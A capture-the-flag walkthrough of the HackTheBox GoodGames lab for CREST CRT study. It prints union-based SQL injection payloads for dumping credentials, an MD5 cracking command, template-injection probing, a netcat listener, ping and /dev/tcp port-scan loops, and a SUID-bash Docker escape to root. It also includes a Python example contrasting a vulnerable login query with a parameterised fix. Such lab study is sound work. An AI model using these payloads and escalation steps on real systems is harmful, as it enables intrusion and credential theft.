We covered HackTheBox GoodGames as part of the CREST CRT track. We went over SQL injection, server-side template injection and Docker privilege escalation.

Initial Reconnaissance and SQL Injection

I started by identifying that the target machine was running a web server on port 80. I discovered a login page and attempted to bypass authentication using SQL injection. I used Burp Suite to intercept the login request and modified the email field with an SQL injection payload. I successfully logged in as the admin.

To dump the database, I used union-based SQL injection payloads. I found the number of columns using payloads like UNION SELECT 1,2,3 and UNION SELECT 1,2,3,4. I then found the database name using UNION SELECT 1,2,3,database(). To find schema names, I used UNION SELECT 1,2,3,group_concat(schema_name) FROM information_schema.schemata. I found table names with UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema='main', where ‘main’ was the database name I discovered earlier. I then found column names by targeting the ‘user’ table: UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name='user'. Finally, I dumped the data to get user credentials with UNION SELECT 1,2,3,group_concat(id, name, password) FROM user. I extracted an MD5 hash for the admin user.

I used John the Ripper to crack the hash: john --format=raw-md5 hashfile. The cracked password was “super administrator”.
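The login bypass and the union-based dump both work because the application builds its SQL from the request's email field. The following is an added example (not the box's own code) showing that vulnerable pattern beside the parameterised fix; it uses an in-memory SQLite table with a constructed schema modelled on the columns dumped above, and a constructed bypass input.

```python
import hashlib
import sqlite3

# Constructed bypass input: the quote closes the string literal, OR 1=1 makes
# the WHERE clause always true, and "-- " comments out the password check.
PAYLOAD = "x' OR 1=1 -- "

def make_db():
    """Constructed stand-in for the app's 'user' table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, name TEXT, email TEXT, password TEXT)")
    db.execute(
        "INSERT INTO user VALUES (1, 'admin', 'admin@example.com', ?)",
        (hashlib.md5(b"super administrator").hexdigest(),),
    )
    return db

def login_vulnerable(db, email, password):
    """String-formatted query: user input becomes SQL syntax."""
    pw = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT id, name FROM user WHERE email = '{email}' AND password = '{pw}'"
    return db.execute(sql).fetchone()

def login_hardened(db, email, password):
    """Parameterised query: input is bound as data, never parsed as SQL.

    Note this fixes the injection only; the unsalted MD5 storage that let the
    hash be cracked with john should also be replaced by a password hash
    such as bcrypt or argon2.
    """
    pw = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT id, name FROM user WHERE email = ? AND password = ?"
    return db.execute(sql, (email, pw)).fetchone()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))   # (1, 'admin')
    print("hardened:  ", login_hardened(db, PAYLOAD, "wrong"))     # None
```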

Server-Side Template Injection (SSTI)

After logging in as admin with the cracked password, I found an admin dashboard. I identified that the server was Python-based (Flask was hinted, and an Nmap scan confirmed Python). I tested for SSTI in an input field (full name) on the admin profile page using the payload {{7*7}}. Since it evaluated to 49, SSTI was confirmed.

I then used a Python SSTI payload to confirm the current user ID (which was root). Next, I used another Python SSTI payload to get a reverse shell. I started a Netcat listener using nc -lvp 4545 to catch the shell.

Docker Privilege Escalation

The reverse shell landed me in a Docker container as the root user. I stabilized the shell using script /dev/null -c bash and stty raw -echo; fg (followed by Enter, then reset and export TERM=xterm). I noticed a .dockerenv file, indicating I was in a Docker environment. I found that the /home/austos directory was mounted from the host machine by checking mounts with mount | grep austos.

To find the host IP, I performed network scanning within Docker using a for loop to ping sweep the local Docker network: for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done. I then port scanned the identified host IP (Docker host) with another for loop: for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done. This revealed ports 22 (SSH) and 80 were open.

I SSHed to the Docker Host using ssh austos@172.19.0.1 with the previously cracked password “super administrator”.

For privilege escalation, I had previously copied the /bin/bash binary from the host to the mounted /home/austos directory while on the host. From within the Docker container, I changed the ownership of this copied bash binary to root: chown root:root bash. Then, I set the SUID bit on the bash binary: chmod u+s bash. Back on the Docker host (via the SSH session), I executed the SUID bash binary from the mounted directory: ./bash -p (the -p flag was crucial to preserve permissions and effectively use the SUID bit). This granted me a root shell on the host machine.

Finally, I confirmed root access with id, navigated to /root with cd /root, and found the flag with ls.

Technical Commands

Here are the technical commands I used:

  • john --format=raw-md5 hashfile
  • nc -lvp 4545
  • script /dev/null -c bash
  • stty raw -echo; fg
  • reset
  • export TERM=xterm
  • mount | grep austos
  • for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done
  • for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
  • ssh austos@172.19.0.1
  • chown root:root bash
  • chmod u+s bash
  • ./bash -p
  • id
  • cd /root
  • ls

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
